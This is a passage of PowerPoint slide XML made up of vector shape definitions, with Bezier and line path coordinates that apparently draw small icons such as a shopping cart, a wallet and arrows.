                  <a:pt x="16691" y="6517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8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8"/>
                  <a:pt x="982" y="17113"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="982" y="9116"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="1136" y="9202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1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1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2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0"/>
                  <a:pt x="15929" y="18514"/>
                  <a:pt x="16200" y="18514"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="16471" y="18514"/>
                  <a:pt x="16691" y="18860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0"/>
                  <a:pt x="1201" y="18514"/>
                  <a:pt x="1473" y="18514"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1744" y="18514"/>
                  <a:pt x="1964" y="18860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7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7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19"/>
                  <a:pt x="0" y="6171"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="0" y="20057"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="20909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09"/>
                  <a:pt x="17673" y="20057"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="17673" y="6171"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="17673" y="5319"/>
                  <a:pt x="17233" y="4629"/>
                  <a:pt x="16691" y="4629"/>
                </a:cubicBezTo>
                <a:moveTo>
                  <a:pt x="8543" y="13297"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="8327" y="14769"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="8595" y="14882"/>
                  <a:pt x="9419" y="15330"/>
                  <a:pt x="9541" y="14500"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="9669" y="13634"/>
                  <a:pt x="8811" y="13410"/>
                  <a:pt x="8543" y="13297"/>
                </a:cubicBezTo>
                <a:moveTo>
                  <a:pt x="4418" y="7714"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="4147" y="7714"/>
                  <a:pt x="3927" y="8060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60"/>
                  <a:pt x="4690" y="7714"/>
                  <a:pt x="4418" y="771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7" name="Shape 2807"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4613686" y="19978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89"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="21577" y="4886"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="21586" y="4833"/>
                  <a:pt x="21600" y="4782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59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8" name="Shape 2808"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5146947" y="19598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1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8"/>
                  <a:pt x="15709" y="5536"/>
                  <a:pt x="15709" y="5400"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="15709" y="5129"/>
                  <a:pt x="15490" y="4910"/>
                  <a:pt x="15218" y="4910"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="15083" y="4910"/>
                  <a:pt x="14960" y="4964"/>
                  <a:pt x="14871" y="5053"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="13745" y="6179"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13745" y="491"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13745" y="491"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="13745" y="220"/>
                  <a:pt x="13526" y="0"/>
                  <a:pt x="13255" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="12983" y="0"/>
                  <a:pt x="12764" y="220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4"/>
                  <a:pt x="11427" y="4910"/>
                  <a:pt x="11291" y="4910"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="11020" y="4910"/>
                  <a:pt x="10800" y="5129"/>
                  <a:pt x="10800" y="5400"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="10800" y="5536"/>
                  <a:pt x="10855" y="5658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09" name="Shape 2809"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5680208" y="19598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2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3"/>
                  <a:pt x="7037" y="18555"/>
                  <a:pt x="7168" y="18613"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="6984" y="18912"/>
                  <a:pt x="6873" y="19260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0"/>
                  <a:pt x="19525" y="18912"/>
                  <a:pt x="19342" y="18613"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="19479" y="18552"/>
                  <a:pt x="19581" y="18430"/>
                  <a:pt x="19619" y="18282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4"/>
                  <a:pt x="12983" y="7855"/>
                  <a:pt x="13255" y="7855"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="13526" y="7855"/>
                  <a:pt x="13745" y="7634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6"/>
                  <a:pt x="15565" y="2107"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="13602" y="144"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="13513" y="55"/>
                  <a:pt x="13390" y="0"/>
                  <a:pt x="13255" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="13118" y="0"/>
                  <a:pt x="12996" y="55"/>
                  <a:pt x="12907" y="144"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="10944" y="2107"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="10855" y="2196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0" name="Shape 2810"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6229117" y="14392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7"/>
                  <a:pt x="13745" y="4711"/>
                  <a:pt x="13745" y="4860"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="13745" y="5159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4"/>
                  <a:pt x="16691" y="2849"/>
                  <a:pt x="16691" y="2700"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="16691" y="2552"/>
                  <a:pt x="16636" y="2417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2"/>
                  <a:pt x="13745" y="540"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="13745" y="689"/>
                  <a:pt x="13801" y="824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2"/>
                  <a:pt x="8836" y="2700"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="8836" y="2999"/>
                  <a:pt x="9056" y="3240"/>
                  <a:pt x="9327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1" name="Shape 2811"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6762379" y="14392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6" y="18643"/>
                  <a:pt x="19342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9"/>
                  <a:pt x="11782" y="4860"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="11782" y="4711"/>
                  <a:pt x="11727" y="4577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9"/>
                  <a:pt x="16691" y="2700"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="16691" y="2402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4"/>
                  <a:pt x="11782" y="689"/>
                  <a:pt x="11782" y="540"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="11782" y="242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7"/>
                  <a:pt x="8836" y="2552"/>
                  <a:pt x="8836" y="2700"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="8836" y="2849"/>
                  <a:pt x="8891" y="2984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2" name="Shape 2812"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7295640" y="14392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0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5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2"/>
                  <a:pt x="0" y="4860"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="5159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7"/>
                  <a:pt x="7037" y="18251"/>
                  <a:pt x="7168" y="18314"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="6984" y="18643"/>
                  <a:pt x="6873" y="19026"/>
                  <a:pt x="6873" y="19440"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="6873" y="20633"/>
                  <a:pt x="7752" y="21600"/>
                  <a:pt x="8836" y="21600"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="9921" y="21600"/>
                  <a:pt x="10800" y="20633"/>
                  <a:pt x="10800" y="19440"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="10800" y="19045"/>
                  <a:pt x="10696" y="18679"/>
                  <a:pt x="10528" y="18360"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="15982" y="18360"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="15813" y="18679"/>
                  <a:pt x="15709" y="19045"/>
                  <a:pt x="15709" y="19440"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="15709" y="20633"/>
                  <a:pt x="16588" y="21600"/>
                  <a:pt x="17673" y="21600"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="18757" y="21600"/>
                  <a:pt x="19636" y="20633"/>
                  <a:pt x="19636" y="19440"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="19636" y="19026"/>
                  <a:pt x="19525" y="18643"/>
                  <a:pt x="19341" y="18314"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="19479" y="18248"/>
                  <a:pt x="19581" y="18113"/>
                  <a:pt x="19619" y="17950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9"/>
                  <a:pt x="12984" y="6480"/>
                  <a:pt x="13255" y="6480"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="13526" y="6480"/>
                  <a:pt x="13745" y="6239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9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2"/>
                  <a:pt x="13526" y="0"/>
                  <a:pt x="13255" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="12984" y="0"/>
                  <a:pt x="12764" y="242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9"/>
                  <a:pt x="10529" y="3780"/>
                  <a:pt x="10800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3" name="Shape 2813"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7828901" y="1458284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3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3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3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3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1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0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1"/>
                  <a:pt x="7037" y="17772"/>
                  <a:pt x="7168" y="17845"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="6984" y="18220"/>
                  <a:pt x="6873" y="18658"/>
                  <a:pt x="6873" y="19131"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="6873" y="20495"/>
                  <a:pt x="7752" y="21600"/>
                  <a:pt x="8836" y="21600"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="9921" y="21600"/>
                  <a:pt x="10800" y="20495"/>
                  <a:pt x="10800" y="19131"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="10800" y="18680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80"/>
                  <a:pt x="15709" y="19131"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="15709" y="20495"/>
                  <a:pt x="16588" y="21600"/>
                  <a:pt x="17673" y="21600"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="18757" y="21600"/>
                  <a:pt x="19636" y="20495"/>
                  <a:pt x="19636" y="19131"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="19636" y="18658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9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9"/>
                  <a:pt x="10529" y="1234"/>
                  <a:pt x="10800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4" name="Shape 2814"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8387555" y="1426542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5" name="Shape 2815"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8908119" y="1426542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5"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="21595" y="21044"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19435" y="6317"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19426" y="6318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8"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="2165" y="6317"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5" y="21044"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14" y="21045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1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1"/>
                  <a:pt x="21600" y="21109"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="21600" y="21087"/>
                  <a:pt x="21589" y="21067"/>
                  <a:pt x="21586" y="210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6" name="Shape 2816"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9422336" y="1426542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5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1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0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1"/>
                  <a:pt x="13581" y="5549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1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6"/>
                  <a:pt x="4418" y="11420"/>
                  <a:pt x="4418" y="11782"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4418" y="12324"/>
                  <a:pt x="4858" y="12764"/>
                  <a:pt x="5400" y="12764"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="5942" y="12764"/>
                  <a:pt x="6382" y="12324"/>
                  <a:pt x="6382" y="11782"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="6382" y="11420"/>
                  <a:pt x="6183" y="11106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6"/>
                  <a:pt x="11291" y="11420"/>
                  <a:pt x="11291" y="11782"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="11291" y="12324"/>
                  <a:pt x="11731" y="12764"/>
                  <a:pt x="12273" y="12764"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="12815" y="12764"/>
                  <a:pt x="13255" y="12324"/>
                  <a:pt x="13255" y="11782"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="13255" y="11420"/>
                  <a:pt x="13056" y="11106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6"/>
                  <a:pt x="7210" y="3927"/>
                  <a:pt x="8836" y="3927"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="10463" y="3927"/>
                  <a:pt x="11782" y="5246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4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3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3"/>
                  <a:pt x="995" y="8282"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="986" y="8281"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="21044"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13" y="21045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1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1"/>
                  <a:pt x="17673" y="21109"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="17673" y="21087"/>
                  <a:pt x="17663" y="21067"/>
                  <a:pt x="17660" y="21045"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="17660" y="21045"/>
                  <a:pt x="17668" y="21044"/>
                  <a:pt x="17668" y="2104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7" name="Shape 2817"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9961945" y="1451935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0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0"/>
                  <a:pt x="10800" y="1320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4"/>
                  <a:pt x="10941" y="0"/>
                  <a:pt x="10800" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="10659" y="0"/>
                  <a:pt x="10534" y="74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8" name="Shape 2818"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10495206" y="14392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2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2"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="13111" y="5242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2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2"/>
                  <a:pt x="8345" y="4860"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="8345" y="5009"/>
                  <a:pt x="8400" y="5144"/>
                  <a:pt x="8489" y="5242"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="8489" y="5242"/>
                  <a:pt x="10453" y="7402"/>
                  <a:pt x="10453" y="740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19" name="Shape 2819"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11028467" y="1439239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79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79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0" name="Shape 2820"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6229117" y="19725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2"/>
                  <a:pt x="10254" y="4577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7"/>
                  <a:pt x="7364" y="2552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1" name="Shape 2821"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6762379" y="19725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7"/>
                  <a:pt x="11291" y="4712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2"/>
                  <a:pt x="14181" y="2417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2" name="Shape 2822"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7295640" y="1972500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3" name="Shape 2823"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7828901" y="1991545"/>
            <a:ext cx="279328" cy="222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3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3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4" name="Shape 2824"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8362162" y="1959803"/>
            <a:ext cx="279328" cy="2792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8" extrusionOk="0">
                <a:moveTo>
                  <a:pt x="10309" y="9720"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9327" y="9720"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="9056" y="9720"/>
                  <a:pt x="8836" y="9937"/>
                  <a:pt x="8836" y="10206"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="8836" y="10475"/>
                  <a:pt x="9056" y="10692"/>
                  <a:pt x="9327" y="10692"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="10309" y="10692"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="10580" y="10692"/>
                  <a:pt x="10800" y="10475"/>
                  <a:pt x="10800" y="10206"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="10800" y="9937"/>
                  <a:pt x="10580" y="9720"/>
                  <a:pt x="10309" y="9720"/>
                </a:cubicBezTo>
                <a:moveTo>
                  <a:pt x="13255" y="18471"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="12273" y="18471"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="12002" y="18471"/>
                  <a:pt x="11782" y="18689"/>
                  <a:pt x="11782" y="18957"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="11782" y="19226"/>
                  <a:pt x="12002" y="19443"/>
                  <a:pt x="12273" y="19443"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="13255" y="19443"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="13525" y="19443"/>
                  <a:pt x="13745" y="19226"/>
                  <a:pt x="13745" y="18957"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="13745" y="18689"/>
                  <a:pt x="13525" y="18471"/>
                  <a:pt x="13255" y="18471"/>
                </a:cubicBezTo>
                <a:moveTo>
                  <a:pt x="10309" y="18471"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9327" y="18471"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="9056" y="18471"/>
                  <a:pt x="8836" y="18689"/>
                  <a:pt x="8836" y="18957"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="8836" y="19226"/>
                  <a:pt x="9056" y="19443"/>
                  <a:pt x="9327" y="19443"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="10309" y="19443"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="10580" y="19443"/>
                  <a:pt x="10800" y="19226"/>
                  <a:pt x="10800" y="18957"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="10800" y="18689"/>
                  <a:pt x="10580" y="18471"/>
                  <a:pt x="10309" y="18471"/>
                </a:cubicBezTo>
                <a:moveTo>
                  <a:pt x="20618" y="15554"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="20618" y="16091"/>
                  <a:pt x="20178" y="16526"/>
                  <a:pt x="19636" y="16526"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="16691" y="16526"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="16149" y="16526"/>
                  <a:pt x="15709" y="16091"/>
                  <a:pt x="15709" y="15554"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="15709" y="13609"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="15709" y="13073"/>
                  <a:pt x="16149" y="12637"/>
                  <a:pt x="16691" y="12637"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="19636" y="12637"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="20178" y="12637"/>
                  <a:pt x="20618" y="13073"/>
                  <a:pt x="20618" y="13609"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="20618" y="13609"/>
                  <a:pt x="20618" y="15554"/>
                  <a:pt x="20618" y="15554"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="18655" y="19443"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="18655" y="19980"/>
                  <a:pt x="18215" y="20416"/>
                  <a:pt x="17673" y="20416"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="1964" y="20416"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="1422" y="20416"/>
                  <a:pt x="982" y="19980"/>
                  <a:pt x="982" y="19443"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="982" y="9720"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="982" y="9183"/>
                  <a:pt x="1422" y="8747"/>
                  <a:pt x="1964" y="8747"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="17673" y="8747"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="18215" y="8747"/>
                  <a:pt x="18655" y="9183"/>
                  <a:pt x="18655" y="9720"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="18655" y="11664"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16691" y="11664"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="15606" y="11664"/>
                  <a:pt x="14727" y="12535"/>
                  <a:pt x="14727" y="13609"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="14727" y="15554"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="14727" y="16628"/>
                  <a:pt x="15606" y="17499"/>
                  <a:pt x="16691" y="17499"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="18655" y="17499"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="18655" y="17499"/>
                  <a:pt x="18655" y="19443"/>
                  <a:pt x="18655" y="19443"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="982" y="7775"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="982" y="7238"/>
                  <a:pt x="1422" y="6803"/>
                  <a:pt x="1964" y="6803"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="2555" y="6803"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2817" y="7775"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1964" y="7775"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="1604" y="7775"/>
                  <a:pt x="1271" y="7878"/>
                  <a:pt x="982" y="8045"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="982" y="8045"/>
                  <a:pt x="982" y="7775"/>
                  <a:pt x="982" y="7775"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="3721" y="3600"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="13629" y="1005"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="14152" y="866"/>
                  <a:pt x="14690" y="1174"/>
                  <a:pt x="14831" y="1693"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="15085" y="2631"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3281" y="5731"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3026" y="4791"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="2886" y="4272"/>
                  <a:pt x="3197" y="3739"/>
                  <a:pt x="3721" y="3600"/>
                </a:cubicBezTo>
                <a:moveTo>
                  <a:pt x="15847" y="5448"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="16476" y="7775"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6989" y="7775"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="6989" y="7775"/>
                  <a:pt x="15847" y="5448"/>
                  <a:pt x="15847" y="5448"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="17673" y="6803"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="18215" y="6803"/>
                  <a:pt x="18655" y="7238"/>
                  <a:pt x="18655" y="7775"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="18655" y="8045"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="18365" y="7878"/>
                  <a:pt x="18032" y="7775"/>
                  <a:pt x="17673" y="7775"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="17493" y="7775"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17230" y="6803"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="17230" y="6803"/>
                  <a:pt x="17673" y="6803"/>
                  <a:pt x="17673" y="6803"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="19636" y="11664"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="19636" y="7775"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="19636" y="6701"/>
                  <a:pt x="18757" y="5830"/>
                  <a:pt x="17673" y="5830"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="16967" y="5830"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15779" y="1441"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="15498" y="404"/>
                  <a:pt x="14422" y="-212"/>
                  <a:pt x="13374" y="66"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="3467" y="2660"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="2419" y="2939"/>
                  <a:pt x="1798" y="4005"/>
                  <a:pt x="2078" y="5042"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="2291" y="5830"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1964" y="5830"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="879" y="5830"/>
                  <a:pt x="0" y="6701"/>
                  <a:pt x="0" y="7775"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="0" y="19443"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="20517"/>
                  <a:pt x="879" y="21388"/>
                  <a:pt x="1964" y="21388"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="17673" y="21388"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="18757" y="21388"/>
                  <a:pt x="19636" y="20517"/>
                  <a:pt x="19636" y="19443"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="19636" y="17499"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="20721" y="17499"/>
                  <a:pt x="21600" y="16628"/>
                  <a:pt x="21600" y="15554"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="21600" y="13609"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="21600" y="12535"/>
                  <a:pt x="20721" y="11664"/>
                  <a:pt x="19636" y="11664"/>
                </a:cubicBezTo>
                <a:moveTo>
                  <a:pt x="13255" y="9720"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="12273" y="9720"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="12002" y="9720"/>
                  <a:pt x="11782" y="9937"/>
                  <a:pt x="11782" y="10206"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="11782" y="10475"/>
                  <a:pt x="12002" y="10692"/>
                  <a:pt x="12273" y="10692"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="13255" y="10692"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="13525" y="10692"/>
                  <a:pt x="13745" y="10475"/>
                  <a:pt x="13745" y="10206"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="13745" y="9937"/>
                  <a:pt x="13525" y="9720"/>
                  <a:pt x="13255" y="9720"/>
                </a:cubicBezTo>
                <a:moveTo>
                  <a:pt x="7364" y="9720"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="6382" y="9720"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="6111" y="9720"/>
                  <a:pt x="5891" y="9937"/>
                  <a:pt x="5891" y="10206"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="5891" y="10475"/>
                  <a:pt x="6111" y="10692"/>
                  <a:pt x="6382" y="10692"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="7364" y="10692"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="7634" y="10692"/>
                  <a:pt x="7855" y="10475"/>
                  <a:pt x="7855" y="10206"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="7855" y="9937"/>
                  <a:pt x="7634" y="9720"/>
                  <a:pt x="7364" y="9720"/>
                </a:cubicBezTo>
                <a:moveTo>
                  <a:pt x="17182" y="14095"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="16911" y="14095"/>
                  <a:pt x="16691" y="14313"/>
                  <a:pt x="16691" y="14581"/>
